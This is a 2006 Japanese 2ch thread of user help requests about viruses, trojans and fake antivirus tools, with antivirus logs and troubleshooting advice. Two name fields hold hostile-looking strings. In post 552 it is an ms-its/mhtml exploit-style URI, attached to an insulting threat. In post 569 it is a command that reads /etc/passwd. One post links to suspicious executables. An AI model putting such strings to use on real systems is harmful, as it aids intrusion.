513 : ◆N9P3SuvBPo :2006/06/16(金) 18:45:31
>恐らくLimewireで感染したウイルスの仕業ぽいんですよね
と言ってるのに
>実際Limewireで感染したかどうかもわからないんですよ…orz
と、言った矢先に>466で
>症状が出始めたのはネトゲの最中でした。
って言ってるからなあ。

どういう経路で感染したのかさえ、はっきり書いてくれれば…
というか、これほど深刻な症状だと、初期化以外に直す方法なんて無いんだが。

514 :名無しさん@お腹いっぱい。:2006/06/16(金) 18:45:48
まぁ自己責任だからねー

515 :名無しさん@お腹いっぱい。:2006/06/17(土) 00:25:06
というか、実際のウイルスは複雑化多様化しすぎてるから、
たとえ情報をテンプレで具体的にあげてもらってもわかんないこと
多いんだよね。答えてる人間もウイルス作者じゃないんだから、
具体的な振る舞いはアンチウイルスメーカーのサイトにある情報しかわからん。
ほんとに答えはリカバリしかない。
512のいう理由をかこつけて「P2P関連のウィルスは別スレです」ってあるけど、
どっちみち対応できないんじゃん。


516 :名無しさん@お腹いっぱい。:2006/06/17(土) 01:26:40
かと言って症状書くか書かないかでは大違い
実際書けば解決する物だってあるだろうし。
わからない場合が多いから書かなくて良いなんてのは暴論

517 :515:2006/06/17(土) 08:32:50
>>516
>わからない場合が多いから書かなくて良い
そんなこといってない。
ただ、ウイルスそのものに対する情報(特にメジャーでないもの)が
少なくて、対応できない場合が多いってこといっただけ。
ウイルスの具体的活動はアンチウイルスメーカーのサイトに全て書かれてるって
わけじゃない。
P2P関連のウィルスであろうが、そうでなかろうがわからないことだらけ。
感染経路もうまく切り分けれなくなってきてる。


518 :名無しさん@お腹いっぱい。:2006/06/17(土) 10:12:31
で、最終的になにがいいたい?

519 :名無しさん@お腹いっぱい。:2006/06/17(土) 11:17:17
なんかこの前なんですけど、たまたまヴラクラ踏んだら、なんかワケのワカラン
DL画像が出たんです。「これネタ?」と思って、ニヤニやしてたら、なんか
「DL完了」とか出たんです。んでそのアトなんですが、迷惑メール
が来るようになったんですよ。しかもその奴がパソコンの垢だったんですよ?
これってどういうことですか?

520 :名無しさん@お腹いっぱい。:2006/06/17(土) 13:44:06
誰か翻訳



やっぱいいや

521 :名無しさん@お腹いっぱい。:2006/06/17(土) 14:20:37
すいません、ちょっと聞いてください。
ブラウザはモジラです。
ファイルを落とそうとクリックしたさい、今まで見たことのないメッセージが表示されたんです。
認証番号が合わない(うろ覚え)、このページはユーザーのデータを盗み取ろうとしている可能性があるみたいなメッセージが出てきました。
これはやばいとキャンセルをしたんですが、そういう場合は実行されていないので大丈夫と考えていいんですよね。

522 :名無しさん@お腹いっぱい。:2006/06/17(土) 14:23:21
さぁ・・・

523 :名無しさん@お腹いっぱい。:2006/06/17(土) 14:49:23
>>518
なんか上級者ぶってみたかっただけです><

524 :名無しさん@お腹いっぱい。:2006/06/18(日) 03:02:20
すみません。教えてください

リアルタイム検索中にウイルス/スパイウェアが見つかったため、自動的に処理しました。処理の結果は次のとおりです。

.処理の結果: ウイルス感染ファイルを隔離できませんでした。このウイルスは、手動で処理する必要があります。
.
ファイル名: C:\Documents and Settings\hisashi\Local Settings\Temporary Internet Files\Content.IE5\I4UX7DGG\13[1].exe
ウイルス/スパイウェア名: TROJ_AGENT.AFW

検索かけて隔離したファイル削除だけじゃだめですか?
レジストリ削除とか怖くてできないんですが・・・
どなたか教えてください。

525 :名無しさん@お腹いっぱい。:2006/06/18(日) 03:04:38
一時ファイルからしか出てないならそれだけで良いと思う。
しかし名前くらい隠しなよw

526 :名無しさん@お腹いっぱい。:2006/06/18(日) 03:19:22
ありがとうございます

527 :名無しさん@お腹いっぱい。:2006/06/18(日) 09:31:01
>>524
リカバリしかないだろうな

528 :424:2006/06/19(月) 10:59:56
>>424
おれと同じ症状の人いないの?_| ̄|○
ちなみにPlugInってフォルダ隠しファイルになってるから、あやしいんだよな・・・

でもググっても同じ症状の人いないし・・・_| ̄|○

もう一度簡単に説明すると、
見た動画ファイルやテキストファイルが勝手に
"C:\Documents and Settings\All Users\Application Data\Microsoft\PlugIn"
のところにコピーされてて、しかもリンクとかじゃなくってファイル丸ごとを・・・

助けてくれ〜(;´Д`)

リカバリーすればいいけど、また発生するかもしらんし解決にならんからやはり原因知りたいっす・・・


529 :名無しさん@お腹いっぱい。:2006/06/19(月) 21:12:01
>>528
わからないけど、
プロパティ見て、作成された時期に何かおぼえない?

530 :424:2006/06/19(月) 21:23:52
そのフォルダにコピられたファイルの作成時間はそのファイルを実行した時間になってました。
ちなみに何回でも再現できますので、ほかに知りたい事があればどんどん聞いてください・・・(;´Д`)

531 :名無しさん@お腹いっぱい。:2006/06/19(月) 21:40:49
うちにはそのフォルダ自体ないなぁ…

そのフォルダの作成時期は?
それから、動画なら動画でどのソフトで再生してもそうなるの?
普段何使ってるか知らんがWMP6.4とかでもそうなる?

532 :424:2006/06/19(月) 21:53:24
あ・・・一回怪しいと思ってフォルダごと削除して、
また勝手にフォルダを作られたんで、
一番最初の作成時期はわからないっす・・・_| ̄|○

動画は現在確認されてるものではWindows Media Player10とReal Playerです。
ちなみに普通のテキストファイル(秀丸で開いたもの)もそのフォルダにコピーされます・・・
あとHtmlファイルなどもありました・・・



533 :名無しさん@お腹いっぱい。:2006/06/19(月) 22:23:06
じゃあ地道に探してみますかね

msconfigのスタートアップタブ開いて現状のチェックあるなしの状態をメモしとく
そんで上半分のチェックをはずす
再起動して症状出るか試す
これで症状でなければ犯人はチェックはずした中にいるし
再現すれば残りの項目の中にいる
犯人のいるほうをさらに半分に分けてもう一回
…以下繰り返しでどの項目があると症状が出るか確定する

これやってるときは無防備になるんでネットは切断してな

534 :424:2006/06/19(月) 22:26:59
ふむふむ
やってみます〜


535 : ◆N9P3SuvBPo :2006/06/19(月) 22:30:46
>533
HijackThisのO04=HKLM_...Runじゃないの?


536 :名無しさん@お腹いっぱい。:2006/06/19(月) 23:06:34
すみません…ワームに感染したようです。まずどうしたら良いのでしょうか?お願いします;
再セットアップをしてからしばらくウィルスバスターをインストールしてませんでした…。

537 :名無しさん@お腹いっぱい。:2006/06/19(月) 23:08:31
>>536
まずは>>1のテンプレ埋めてくれ
お前さんがどんな環境にあって何にかかったのかもわからんでは
まともな返答は期待できんよ

538 :名無しさん@お腹いっぱい。:2006/06/19(月) 23:29:07
まずXPを使っています。アップデートは時々しています。WORM RBOT CWOという名前のが3つ有り、で、その感染したファイルは発見できませんでした。
…という感じでは駄目でしょうか?



539 :名無しさん@お腹いっぱい。:2006/06/19(月) 23:39:54
>>538
>>1


540 :名無しさん@お腹いっぱい。:2006/06/19(月) 23:44:15
ごめんなさい。相方がなんとかやってくれて大丈夫そうです。
勉強し直してきます。

541 :424:2006/06/19(月) 23:45:02
>>533
>>535

犯人がわかりました〜〜〜〜〜
まさかそいつが犯人だったとは・・・(;´Д`)
犯人は
C:\WINDOWS\System32\hkcmd.exe
です。
結構普通にあるものなので怪しいとは思わなかった・・・
最後まで信じてたのに〜〜〜(T-T )( T-T) ウルウル

たぶんなんかの拍子で改ざんされたのかな・・・
まあ、別になくてもいいようなもんなのでHijackThisを使って消します。

ありがとうございました〜m(__)m

542 : ◆N9P3SuvBPo :2006/06/20(火) 18:03:39
>538
今言えることは、アップデートしているのになんでRBOTに感染するのか。

543 :名無しさん@お腹いっぱい。:2006/06/21(水) 13:35:04
http://www.vipper.net/vip50124.zip.html

544 :名無しさん@お腹いっぱい。:2006/06/21(水) 13:36:17
すみません。途中発射しました。
上のはなんですか?

545 :名無しさん@お腹いっぱい。:2006/06/21(水) 15:14:27
>>543-544
ここで聞いてみて
http://etc3.2ch.net/test/read.cgi/entrance/1150289231/

546 :名無しさん@お腹いっぱい。:2006/06/21(水) 15:25:10
>>544
50124以外に50126、50128、50130に似たようなような奴が
あったのでついでに実行してみた

50124と50126のvip.exeはエラー吐いて上手く動かなかった
50128と50130はデスクトップに中身が空のフォルダを永遠に生成し続ける迷惑ファイル
50130の方は実行後窓がすぐに消えてしまうのでプロセス殺して止めた

まぁ実行して得のあるものじゃないと思われ
心配ならもっと詳しい奴に聞いてみれ

547 :名無しさん@お腹いっぱい。:2006/06/21(水) 15:42:23
今見たら50132に掃除機.exeがあったのでこれも実行

窓が開いて数字のカウンターが増えていく
と、同時にさっきデスクトップに作られた空のフォルダが削除された

とりあえず連中の考える事はよくわからん

548 :名無しさん@お腹いっぱい。:2006/06/21(水) 16:33:20
mixiの“チェーン日記”でワーム感染が拡大
ttp://headlines.yahoo.co.jp/hl?a=20060621-00000034-zdn_n-sci
問題の日記は、「『ぼくはまちちゃん!』というタイトルの日記にコメントすると、
自分の日記にも自動的に同じ内容の記事が投稿され、メールや本名などの個人情報が漏洩する。
これはワームという名のウイルスで、mixi管理者でも対応できないほどのスピードで繁殖を繰り返している。

NOD32の体験版を入れていたけど、感染してしまったです。orz
自分ではちゃんとしていたつもりでも、用心が足りなかったのかな・・・・。
悔しいのでマルチ。


549 :名無しさん@お腹いっぱい。:2006/06/21(水) 17:02:38
age

550 :名無しさん@お腹いっぱい。:2006/06/21(水) 18:29:29
あるスレッドにあった、次の書き込みの「省略されました・・・」をクリックすると
ノートンが Bloodhound.Exploit.6 のウィルス検地しやがります。
色々文字列いじってみたんですが、名前がこれで、書き込みありで、省略された時のみ
出るみたいです。これって何?(次投稿参照)

551 :名無しさん@お腹いっぱい。:2006/06/21(水) 18:29:49
>>548
ttp://news.goo.ne.jp/news/rbb/it/20060621/31683-rbb.html
mixi、「『ぼくはまちちゃん!』はウイルス」とのデマに注意を呼びかけ

mixiは、特定のURLをクリックするだけでウイルスに感染したり個人情報が漏えいする、
とのデマに対して注意を呼びかけている。

このデマは、特定のURLをクリックするとタイトルが「ぼくはまちちゃん!」となった日記が
作成されてしまう現象が6月18日に発生したことが発端。
この現象だが、すぐに原因が特定され1時間後に対応を完了した。

552 :ms-its:mhtml:file://c:\[:2006/06/21(水) 19:02:58
死死死死死▼死死死死死死死死▼▼▼鬱死死死死死死死死
死死死死死■■▼鬱死死死死死▼■▼鬱死死死死死死死死
死死死死▼■■鬱死死死死死死■■▼鬱死死死死死死死死
死死死▼■■▼鬱死死死死死▼■■▼▼▼▼■■▼鬱鬱死
死死死■■■鬱鬱▼▼死死死▼■■■■■■■■■▼鬱死
死▼▼■■▼鬱▼■■▼鬱▼■■▼▼▼▼▼■■■鬱鬱死
▼■■■■▼▼■■▼鬱鬱▼■■■鬱鬱鬱▼■■▼鬱死死
▼■■■■▼▼■▼鬱鬱▼■■▼■▼死▼■■■鬱鬱死死
死▼■■■■■■▼鬱▼■■▼▼■■▼■■■▼鬱死死死
死死▼■■■■▼▼鬱▼■▼鬱鬱▼■■■■▼鬱鬱死死死
死死死▼■■▼▼■▼鬱▼鬱死死鬱▼■■■鬱鬱死死死死
死死死▼■■鬱鬱■■▼鬱死死死死▼■■▼▼鬱死死死死
▼▼▼■■■▼■■■■▼死死▼▼■■■■■▼鬱鬱鬱死
■■■■■■■■▼■■▼▼■■■■▼■■■■■■▼▼
■■▼▼▼■■鬱鬱▼▼■■■■▼▼鬱鬱▼■■■■■▼
▼▼▼鬱鬱■■鬱▼▼▼■■■▼▼■▼▼▼▼■■■■▼
鬱■■■▼■■▼■■▼■■▼鬱▼■■■■▼▼▼▼▼鬱
死■■■▼■■▼■■▼▼▼鬱鬱▼■■■■■■▼鬱鬱鬱
死■■■▼■■鬱▼■■鬱鬱鬱死鬱▼▼■■■■▼鬱死死
▼■■■鬱■■鬱▼■■▼鬱死▼鬱鬱鬱▼■■▼鬱鬱死死
▼■■■鬱■■鬱死■■▼鬱▼■■▼▼▼鬱鬱鬱鬱死死死
▼■■▼鬱■■鬱死■■▼鬱▼■■■■■▼▼鬱鬱鬱鬱死
▼■■▼鬱■■鬱死▼▼鬱鬱▼■■■■■■■■▼▼鬱死
▼■■▼鬱■■鬱死鬱鬱鬱鬱鬱▼▼■■■■■■■▼鬱死
死鬱鬱鬱鬱■■鬱死死死死死鬱鬱鬱鬱▼■■■■■▼鬱死
死死死死死■■鬱死死死死死死死死鬱鬱鬱▼▼▼▼鬱鬱死

糞スレ立てるな池沼がハッキングして殺されたいか?

553 :550:2006/06/21(水) 19:03:50
>>552が、そのウィルス警告が出るやつです

554 :名無しさん@お腹いっぱい。:2006/06/21(水) 21:41:24
>>552
ノートンがvbsウィルスのソースに誤反応3
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/逝け

555 :名無しさん@お腹いっぱい。:2006/06/22(木) 10:33:53
【使用OS】 XP
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 avast!
【ちゃんとUpdateしてるか】 していない
【スキャンした結果(ウイルス名・発見場所)】 Win32:Spyware-gen(トロイの木馬)
【場所】c:\program files\newdotnet\newdotnet7_22.dll
     c:\progra~1\newdot~1\newdot~2.dll

【症状を具体的に、分かる限りすべて書く】 今のところ症状はない
【何をしたらそんなことになったのか】 掲示板で踏んでしまった
【これまでにとった措置】 チェストに入れようとしても、別のプロセスが使用中です。と移せない
【その他の質問】 削除したらネットに繋がらなくなったので、
復元して戻したんですけどこのまま放置してても平気ですかね?

お願いします

556 :名無しさん@お腹いっぱい。:2006/06/22(木) 11:18:36
>>555
ここのオンラインスキャンで駆除できる

ttp://www.spywareguide.com/

557 :名無しさん@お腹いっぱい。:2006/06/22(木) 20:59:17
【使用OS】XP

【WindowsUpdateしてるか】しています

【AntiVirusは何を使っているか】Symantec AntiVirus

【ちゃんとUpdateしてるか】していません
【スキャンした結果】WScript.Kak.Worm

【場所】Documents and Settings\Owner\Local
Settings\Temporary\Internet Files\Content.IE5\2T1QBQHW\

【症状を具体的に、分かる限りすべて書く】今のところ症状はありません

【何をしたらそんなことになったのか】2ちゃんねるの掲示板で踏んでしまいました

【これまでにとった措置】クリーニングをしようとしたら、エラーが出て来てしまいました

【その他の質問】ウイルスに感染するのは初めてで、どの様に対処をしたらよいのか全然わかりません。
危険なウイルスなのでしょうか…?

よろしくお願い致します。


558 :名無しさん@お腹いっぱい。:2006/06/22(木) 21:02:32
初心者はPC初心者板行けよ

ノートンがvbsウィルスのソースに誤反応3
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/

559 :名無しさん@お腹いっぱい。:2006/06/22(木) 21:14:08
Symantec AntiVirusって脆弱性があるんじゃなかったっけ
Updateしといたほうがええで



560 :名無しさん@お腹いっぱい。:2006/06/23(金) 00:02:05
winantivirusにひっかかってしまいました。
ですがwinantivirusを最後までダウンロード・インストールせずに済みました。
けれど、パソコンを立ち上げる度に、「winantivirusをインストールしますか?」という警告が出ます。
いつもキャンセルをクリックし、何事もないのですが、
この警告を出さないようにするためにはどうすれば良いのでしょうか?
この警告が出るということはすでにwinantivirusに感染しているということでしょうか?

【使用OS】XP

【WindowsUpdateしてるか】しています

【AntiVirusは何を使っているか】McAfee

【ちゃんとUpdateしてるか】しています

【スキャンした結果】なにも検出されず

【症状を具体的に、分かる限りすべて書く】今のところ重くなるなどの動作は何もありません。

【何をしたらそんなことになったのか】winantivirusにひっかかってしまいました。

【これまでにとった措置】
マカフィーがピコピコうるさかったので結局ダウンロード・インストールしませんでした。
ネットでwinantivirusで検索したところ対処方法は「プログラムの追加と削除」を開き
winantivirusのプログラムを削除すると書いてありましたが、
上に書いたように途中で止めたので「プログラムの追加と削除」にはこのwinantivirusのプログラムはありませんでした。

よろしくお願い致します。


561 :名無しさん@お腹いっぱい。:2006/06/23(金) 00:38:24
>>560
少なくてもActiveX(Downloaded Program Files)は居残っている状態なわけだ。
対処法はここみてみなさいな
http://www.higaitaisaku.com/removewinfixer.html
http://hjdb.higaitaisaku.com/database.cgi?cmd=dp&num=467


562 :名無しさん@お腹いっぱい。:2006/06/23(金) 10:49:49
>>556
ありがとうございます!

563 :名無しさん@お腹いっぱい。:2006/06/23(金) 16:35:40
>>561
返答ありがとうございます。
そのサイトは昨日も見たのですが、いかんせんそのActiveX(Downloaded Program Files)がどこにあるのかわからないのです。
「Spybot S&D 1.4によるスパイウェアの除去方法」をしてみたらいいのでしょうか?

564 :名無しさん@お腹いっぱい。:2006/06/23(金) 16:52:39
駆除方法の
Downloaded Program Filesフォルダ内の詳細を見る方法

は見たか?

565 :名無しさん@お腹いっぱい。:2006/06/23(金) 17:38:32
>>564
見ました。
セミコロンも入れました。でもないんですよ。

566 :名無しさん@お腹いっぱい。:2006/06/23(金) 20:10:16
専用スレあるだろうが

WinAntiVirus Pro 2006
http://pc8.2ch.net/test/read.cgi/sec/1143972325/

567 :名無しさん@お腹いっぱい。:2006/06/23(金) 20:28:12
>>566
ありがとうございます。

568 :名無しさん@お腹いっぱい。:2006/06/27(火) 07:39:15
すいません質問です。
2chのこのページの入るだけでウィルスに感染してしまいます。いつもノートンが駆除しています。
これはいったいどのようなトリックになっているのでしょうか?ちなみにバスターは反応しません。
http://pc8.2ch.net/test/read.cgi/sec/1124077234/

569 :cat /etc/passwd | nobody:2006/06/27(火) 07:56:15
うーん、どうしてかな

570 :名無しさん@お腹いっぱい。:2006/06/27(火) 16:36:03
ごめんなさい、質問です。

nyのウイルスの中に自分がnyやってることをメールで送信するウイルスがあるそうですが、
そういうウイルスがメールを送信する前にウイルスを素早くPC内から削除しておけば(リカバリしました)、
今後メールを送られる心配はないのでしょうか?
もしウイルスに掛かってた場合個人情報がnyに流れたらもう仕方ないとは思いますが、
メールを送られるのは耐え難いと思い質問しました。今のところ友人からも誰も不審なメールが来たという報告は受けないのですが…。

【使用OS】XP
【WindowsUpdateしてるか】してる
【AntiVirusは何を使っているか】ウイルスバスター
【ちゃんとUpdateしてるか】してる
【スキャンした結果(ウイルス名・発見場所)】圧縮ファイルを解凍しようとしたら、リアルタイム検索でAntinny.A、Antinny.G、PE Patrite.Aを検出しましたが、感染する前に隔離・駆除されました。
【別のオンラインスキャンしたならその結果は】リカバリする前にトレンドマイクロ、システマック、マカフィーでオンラインスキャンしましたが何も検出されず。
【症状を具体的に、分かる限りすべて書く】様々な感染確認方法を試みましたが異常は発見されず。ただ、winnyはすぐに捨ててしまい、upフォルダができていたかどうか確認できませんでした。
【何をしたらそんなことになったのか】ウイルスに感染したかどうかわからないのですが、もし感染していたらどうしようと心配のあまり質問しました。すいません。
【これまでにとった措置】オンラインスキャン3回、元々導入してたウイルスバスターでの手動検索2回。ネットで見た感染確認方法を頼りに感染しているか調べる。その後念のためリカバリ。hotmailのアドレスなどPW全て変更。
【その他の情報】ny暦:5日
        落としたファイル21個
        そのうちリアルタイム検索で検出されたファイル:3個

反省しております。どうか教えて下さい。

571 :570:2006/06/27(火) 17:21:48
すいません、winny専用のスレがあったのですね。
そちらに移動します。570は見なかったことでお願いします。

572 :名無しさん@お腹いっぱい。:2006/06/28(水) 17:05:30
XP AVG ZA spybot ad-aware
昨日突然regscanが動き出した
バックドアらしいけどビクーリした
regscanはXPにはないけどウイルスじゃないから何も反応しないんだよね
たぶんBTからだとおもう

573 :名無しさん@お腹いっぱい。:2006/06/29(木) 09:18:12
>569(゚听)ツマンネ

574 :名無しさん@お腹いっぱい。:2006/06/29(木) 14:57:49
無線LANを使用しているんですが、
ブラウザ(greenbrowser)でネットのダウンロード速度とアップロード速度
を表示してると何もしてなくても頻繁に数字が0になったり数字が上がったり
してるんですがこれってスパイウェアが原因なんでしょうか?
タスクマネージャを見てもネットワーク使用率が0からわずかに上がったり
0に戻ったりしています。

575 :名無しさん@お腹いっぱい。:2006/06/29(木) 16:05:34
【使用OS】WindowsXP SP2
【WindowsUpdateしてるか】している
【AntiVirusは何を使っているか】 以前、Norton2003で現在はウイルスバスター2006(体験版)
【ちゃんとUpdateしてるか】している
【スキャンした結果(ウイルス名・発見場所)】 見つからない
【別のオンラインスキャンしたならその結果は】 見つからない
【症状を具体的に、分かる限りすべて書く】 ActiveXが完全に機能しない
【何をしたらそんなことになったのか】 いつからかわからないが、ActiveXコントロールのインストールを必要とされるウェブページ、及びオンラインウイルススキャンやアップデータなどができなくなった。
【これまでにとった措置】
・セキュリティの問題だと思い、最低レベルまで許可したり、逆に中ぐらいでやってみたり、色々調べた。→意味なし
・IEのアップデータに不手際があったとのことで修正プログラムKB912945を導入→意味なし
・IEを6から7ベータにUP→意味がなかったので戻す
・IEの初期化、レジストリの初期化→意味なかったのでバックアップで戻す
・ウイルス、スパイウェア駆除ソフトでスキャン→意味なし
・別のユーザーアカウントで試してみる→意味なし
【その他の質問】
この症状が起こる前にインストールされたActiveXは正常に機能してますが、この症状に気付いた以降のActiveXはまったくインストールできません。
ウイルスの線が濃厚なので、この症状について詳しい人教えてください。

576 :名無しさん@お腹いっぱい。:2006/06/29(木) 18:04:23
【使用OS】windows2000 SP4
【WindowsUpdateしてるか】自動更新してます
【AntiVirusは何を使っているか】ノートン
【ちゃんとUpdateしてるか】自動更新してます
【スキャンした結果(ウイルス名・発見場所)】Backdoor.Graybird
C:WINNT\system32\DrivKey.DLL
【別のオンラインスキャンしたならその結果は】フレッツ接続ツール起動しない為試せません
【症状を具体的に、分かる限りすべて書く】禿しく重いです…。タスクマネージャすら起動しません。10分程放置するとタスクトレイにアイコンは表示されるんですが、クリック&ポイントには反応しません。

【何をしたらそんなことになったのか】先日YouTubeのflvを落としてたらノートンがウイルスを削除しましたとポップアップされたので、念のためにウイルススキャンを行い発見されなかったので通常終了したのですが、先程起動させてみたら上のような症状に陥りました…。

imonaからのカキコなので【これまでにとった措置】と【その他の質問】は次にかかせて頂きます。連投お許し下さい…。

577 :名無しさん@お腹いっぱい。:2006/06/29(木) 19:20:42
すみません助けて下さい。
ハウンドドッグスレに、以前から何度もウィルスらしきものが貼られます。
http://music5.2ch.net/test/read.cgi/musicjg/1151501571/l50
ノートン無効にしても、文字がおかしな表示になったりして・・・
悪質な嫌がらせと思いますが対処の方法があれば
どうか教えて下さいませ。。。


578 :名無しさん@お腹いっぱい。:2006/06/29(木) 19:51:34
>>577

>>7
>>558

579 :名無しさん@お腹いっぱい。:2006/06/29(木) 20:15:26
初めまして
2ヶ月ほど前に他スレでUPされていたファイルがウイルスでそれを踏んでしまいました
翌日ノートンを購入して駆除しました
その後、マイコンピューターを開く時に「explorer.exeがネット接続しようとしています」という警告が出るのです
これはノートンの仕様かと思っていたのですが、どうやら違うようなのです(普通そんな警告出ないと指摘されました)
ノートンの完全チェック、ノートン&バスター&マカフィーのオンラインスキャンではウイルスは発見されませんでしたが、気持ち悪いです
このような現象を引き起こすウイルスというのはありますか?対処方等あれば御助言下さい

580 :名無しさん@お腹いっぱい。:2006/06/29(木) 20:34:53
他の製品に乗りかえる手もあるけどな。
フリーならこの辺が有名だよ。
http://www.grisoft.com/
軽快でヒューリスティックが優れているやつならこれが評判良いよ。
http://canon-sol.jp/product/nd/trial.html

581 :ヮリャ:2006/06/29(木) 20:37:36
http://pr3.cgiboy.com/S/4903137

582 :名無しさん@お腹いっぱい。:2006/06/29(木) 20:38:07
explorerが外へつなぎに行くのもない話ではないけどな
つなごうとする先は?IPアドレスとかポートとか

583 :名無しさん@お腹いっぱい。:2006/06/29(木) 20:41:15
あー書き忘れたがその現象が発動する条件は?
特定のフォルダ開いたときとか一定時間おきにとか

584 :579:2006/06/29(木) 20:51:01
色々指摘アリガトウ御座います
>>582
ノートンの警告画面では
IPは自分のIP、ポートは0使用と出ます
>>583
出る時と出ない時があります
頻発するのはディスクトップ上のマイコンピューターを開く時とディスクトップ上にあるフォルダーを開く時です
それ以外では出た覚えはありません
頻度は2日に一度ぐらい、一度出るとその日は頻発します


585 :名無しさん@お腹いっぱい。:2006/06/29(木) 21:01:22
無線LANを使用しているんですが、
ブラウザ(greenbrowser)でネットのダウンロード速度とアップロード速度
を表示してると何もしてなくても頻繁に数字が0になったり数字が上がったり
してるんですがこれってスパイウェアが原因なんでしょうか?
タスクマネージャを見てもネットワーク使用率が0からわずかに上がったり
0に戻ったりしています。

586 :名無しさん@お腹いっぱい。:2006/06/29(木) 21:30:05
おマルチ 乙

587 :576:2006/06/30(金) 01:53:13
>>576です。連投になりますが続きです。何故かimonaで書き込めなくて遅くなりすみません…。

【これまでにとった措置】
セーフモードで起動してウイルススキャンした結果、発見された後に削除と表示されたので通常起動させたのですが、何も改善されず同一症状でした。
そこで再度セーフモードでスキャンしてみたところ、またしてもウイルスが発見され削除となりましたので、念のためその状態でもう一度スキャンしましたが発見されなかったので、通常起動させてみたのですが改善されませんでした…。
携帯でググってBackdoor.Graybirdについて調べてレジストリの操作で駆除を試みたのですが、記載されているレジストリ値が発見できずに断念しました…。

【その他の質問】
ウイルスに関して無知に近いのですが、シマンテックのHPによるとこのウイルスはトロイとのことですが、この症状は以前感染したワーム(名称は忘れてしまいました)の症状に似ていると思います…。大変恐縮ですがどなたかご教授よろしくお願い致します。
なお私には携帯しか手元にございませんので、ご迷惑をおかけするかと思いますがよろしくご指導願いますm(__)m


588 :名無しさん@お腹いっぱい。:2006/06/30(金) 04:49:36
>>587
リカバリ

589 :名無しさん@お腹いっぱい。:2006/06/30(金) 08:08:19
>>587
Backdoor.Graybirdっていっても多数の亜種があって、
各種挙動が違うし、書き換えるレジストリ値も違う。
削除は困難かも。

590 :名無しさん@お腹いっぱい。:2006/06/30(金) 10:41:58
age

591 :名無しさん@お腹いっぱい。:2006/06/30(金) 13:10:24
>この症状は以前感染したワーム

 おまいの頭はネットに不向きだ。pc捨ててしまえ

592 :名無しさん@お腹いっぱい。:2006/06/30(金) 19:34:31
ルーターで繋げている2台のPC、
3日ほど前&昨日からマウスが度々(10分に1度以上の頻度)止まるようになりました
マウスはUSBで、止まった後抜き差ししたら復活します

スキャンしても何も見つかりません
これってウイルスかトロイ系の症状ですか?



593 :名無しさん@お腹いっぱい。:2006/06/30(金) 19:43:55
>>5876
ウイルス名はBackdoor.Graybirdだけなのか
Backdoor.Graybird A とかBackdoor.Graybird Bとかじゃないのか
>>589の言う通りこいつは亜種が大量にありそれぞれレジストリの書き換え方が違う
ウイルス名を正確に見直してみろ
だめだったらウイルスバスターオンラインスキャンやってみろ
バスターもGraybird亜種にはかなり対応しているようだ



594 :593:2006/06/30(金) 19:46:18
アンカーミス
× >>5876
○ >>587


595 : ◆N9P3SuvBPo :2006/06/30(金) 20:50:36
>587
>Backdoor.Graybird
>記載されているレジストリ値が発見できずに断念しました…。

Rootkitってやつか…

596 :名無しさん@お腹いっぱい。:2006/07/01(土) 18:41:17 ?
こんばんは。
あるソフトを実行したところ何も反応がなかったので一応ウィルススキャンをしてみたところ検知されました。
AVASTを使っているのですがなぜ実行しようとしたときに警告が出なかったのでしょうか?
そのウィルスはチェスとへ移動しました。
(ちなみにチェストへ移動したあとそれを削除しても構わないのですか?)

PCには何の変化もないので平気なのでしょうか?
いまはこちらのツール↓
http://www.ahnlab.co.jp/download/vdn_view.asp?num=29&pagecnt=1

を使ってスキャンしていますが何も検出されません。

それとwinnyなどで落としたファイルの事前検知は常識ですか?

597 :名無しさん@お腹いっぱい。:2006/07/01(土) 18:55:58
>>596
>>1

598 :596:2006/07/01(土) 19:00:18 ?
【使用OS】 XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 AVAST
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 Win32/Antinny shareから落としたフィイル
【別のオンラインスキャンしたならその結果は】 share.exe本体に反応したのですがこれは普通ですか?削除すべきですか?

599 :名無しさん@お腹いっぱい。:2006/07/01(土) 21:48:19
PCを初めて買いました基本ソフトはXPです!オンラインショピングとかしたいので最強のセキュリティソフトの組み合わせを教えて下さい宜しくお願いします!

600 :名無しさん@お腹いっぱい。:2006/07/01(土) 22:44:23
>>599
買い物は、お店へ財布持っていって買いましょう


601 :名無しさん@お腹いっぱい。:2006/07/01(土) 23:36:38
オマエ死ね

602 :名無しさん@お腹いっぱい。:2006/07/01(土) 23:48:03
exeを踏んでしまい、オンラインスキャンをしたところ『TSPY_KAKKEYS.AF』と言うのに感染してしまいました。
駆除方法がわかりません。教えてください。
【使用OS】 XP
【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 avast!
【ちゃんとUpdateしてるか】 はい
【スキャンした結果(ウイルス名・発見場所)】 TSPY_KAKKEYS.AF
【別のオンラインスキャンしたならその結果は】 avastは反応せず、ウィルスバスターのオンラインスキャンしました。
【症状を具体的に、分かる限りすべて書く】 実質被害はなし、exeを踏んでしまったので、検索したらでてきました。
【何をしたらそんなことになったのか】 exeを実行した
【これまでにとった措置】 ウィルスバスターのオンラインスキャン
【その他の質問】 駆除方法をおねがいします。


603 :名無しさん@お腹いっぱい。:2006/07/02(日) 05:17:27
>>602
バスターの体験版インスコして駆除

604 :名無しさん@お腹いっぱい。:2006/07/02(日) 06:31:47
>>602
>>1
Winny、P2P関連のウィルスは、Download板に専門スレッドがあります




605 :名無しさん@お腹いっぱい。:2006/07/02(日) 07:01:40
よくスレにウィルスコードを貼られて、ノートンのオートプロテクトが暴走しないように
ログのディレクトリは除外してあるのですが、ファイアーウォールの方が暴走して
サーバに接続ができなくなります。
対処方法はわかるのですが(コード解析してdat書き換えのやり方)、
これでは毎度毎度めんどうなので、どうすれば暴走しないようにできますか?

NortonAntiVirus2006使ってます。
OSはWindowsXP (SP2)です。


606 :名無しさん@お腹いっぱい。:2006/07/02(日) 07:02:10
すみませんsage忘れましたごめんなさい。

607 :名無しさん@お腹いっぱい。:2006/07/02(日) 11:51:23
ノートンスレで聞きなよ

608 :名無しさん@お腹いっぱい。:2006/07/02(日) 17:17:12
総合じゃないのかよ

609 :名無しさん@お腹いっぱい。:2006/07/02(日) 18:57:44
>>73 さんと全く同じ状況なのですが、
対処方法がわからず、困っています。どうかご教授ください。

【使用OS】 Windows 2000
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 Avast!
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】 発見できず

